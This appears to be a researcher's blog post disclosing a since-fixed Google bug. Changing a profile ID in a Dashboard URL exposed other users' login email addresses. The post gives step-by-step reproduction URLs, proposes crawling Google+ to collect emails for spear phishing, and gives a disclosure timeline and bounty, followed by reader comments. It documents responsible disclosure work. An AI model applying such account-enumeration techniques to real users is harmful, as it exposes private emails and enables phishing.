tl;dr I found a bug that allowed me to find anyone with a Google+ account’s login email address (even if they chose not to share it). This could be used to target specific people or just crawl Google+ collecting emails, and tying them easily to other social accounts as step one of something nefarious (e.g spear phishing, or other account compromise). This has now been fixed by Google’s security ninjas.
Intro
I often spend time poking around Google for security holes as it is a great way to learn and they have a nice bounty program, so it is win win. I’ve previously claimed a bounty for an authorisation bypass that required modifying the payload of a POST request to one of their backend systems, but today’s bug is far simpler to abuse.
I was poking around Google’s Dashboard where you can monitor account activity etc., and as part of getting my bearings I was doing a first pass to see how the site responded to different unauthorised requests. I found that in certain conditions one such unauthorised request prompted me to login with Google’s new “One account. All of Google” login screen, and prompted me with the login email address, thus exposing it to me for an account I was unauthorised for.
So I was now able to select a target from their Google+ profile and find out their login email address. Alternatively, I could just crawl Google+ profile pages collecting email addresses (and other linked social accounts) forming a nicely little database for spear phishing attacks.
The Bug
I found a URL from a Google email that linked to my Dashboard with an extra parameter:
https://www.google.com/settings/dashboard?uq=114756468015607312300
I immediately recognised the long number as that which appeared in my Google profile URL, before I changed it a pretty one. Lots of profiles are still in the format of:
https://plus.google.com/103112588675637065591/posts
My ‘pretty’ URL one is:
https://plus.google.com/+TomAnthony/posts
And in the source code of my profile you’ll find that ID (114756468015607312300) over 400 times. So these are very much public.
Step One
Change the ID to someone else’s and see what happens:
https://www.google.com/settings/dashboard?uq=106858636547986185729
You get redirect to a login page, as expected.
Step Two
Login to your own account, and then try the same URL again:
https://www.google.com/settings/dashboard?uq=106858636547986185729
I get 302 redirected to accounts.google.com to the ‘add session’ login rather than the primary login page, but what is that in the URL:
The URL contains the login email address for the account identified by your selected ID number in a hash fragment which is used to pre-populate the login field. I’m still learning this stuff, but I’m unsure how that would ever be a good idea.
I reported the bug before trying to dig into whether any additional account information was leaked.
Step Three
You can now visit your favourite celebrity’s page and get their email (well, their team’s email for most probably, but for some more tech savvy maybe their actual address). Alternatively, and more likely you can target other specific victims, or just write a basic crawler to crawl Google+ tying emails to account ID numbers and other social accounts such as Twitter, LinkedIn, Facebook that the user has in their profile, or their website etc. This would be a great basis for spear phishing or as a first step to trying to compromise someones account.
Timeline
March 4th – Initial Report
March 4th – Google replied within 4 hours seeking clarity.
March 5th – Google notified the bug was triaged.
March 6th – Google email again following up.
March 6th – I asked about disclosure. Google asked me to wait until fix verified.
March 7th – Google let me know the bug is fixed and verified.
March 14th – Google contacted to confirm a bounty of $1337. Thanks! 🙂
Google should let me know next week whether this qualifies for a bounty (the team votes on all reports at scheduled meetings); I’ll update this post when they do.
Thanks to the Google security team, who were responsive to reply, fast to fix and very communicative.
11 responses to “Google Exploit – Steal Account Login Email Addresses”
Great find, I’m a Google+ user and honestly, I could have used this little bug a couple of times myself. Keep on auditing! 🙂
Thanks!
There certainly is a temptation to sit on things like this and use them, but the bounty programs are a great incentive, and I’m not sure I’d ever want to be on the receiving end of these sorts of exploits, so couldn’t talk myself into keeping it secret!
Well somebody hacked my Google+ account and stirred up a bunch of bullshit and now I’m not allowed back on. Same with my Facebook account, Twitter account, YouTube account. All got disactivated. So how kool is that!!? Not kool at all, it fuckin sucks if u ask me. I lost alot of friends, family and acquintences. People I do business with I mean. Hackers need to be stopped. Unless they have some porn hacks they wanna share with me. Other than that it’s bullshit
[…] Source: Tom Blog […]
Noticed this bug yesterday but in my haste, it didn’t sink in how easily this could be exploited by the bad apples among us. Thanks for sharing.
pretty smart find and kudos for your honesty id have exploited the heck out of it myself.
[…] READ MORE HERE […]
[…] I found a bug that allowed me to find anyone with a Google+ account's login email address. This could be used to target specific people for spear phishing. […]
” I found a bug that allowed me to find anyone with a Google+ account’s login email address (even if they chose not to share it). This could be used to target specific people or just crawl Google+ collecting emails…”
Awful! I couldn’t think that they did it (
[…] Zdobywanie adresów email użytkowników Google+ […]
That is a real big bug. I hope Google must have fixed it up by now.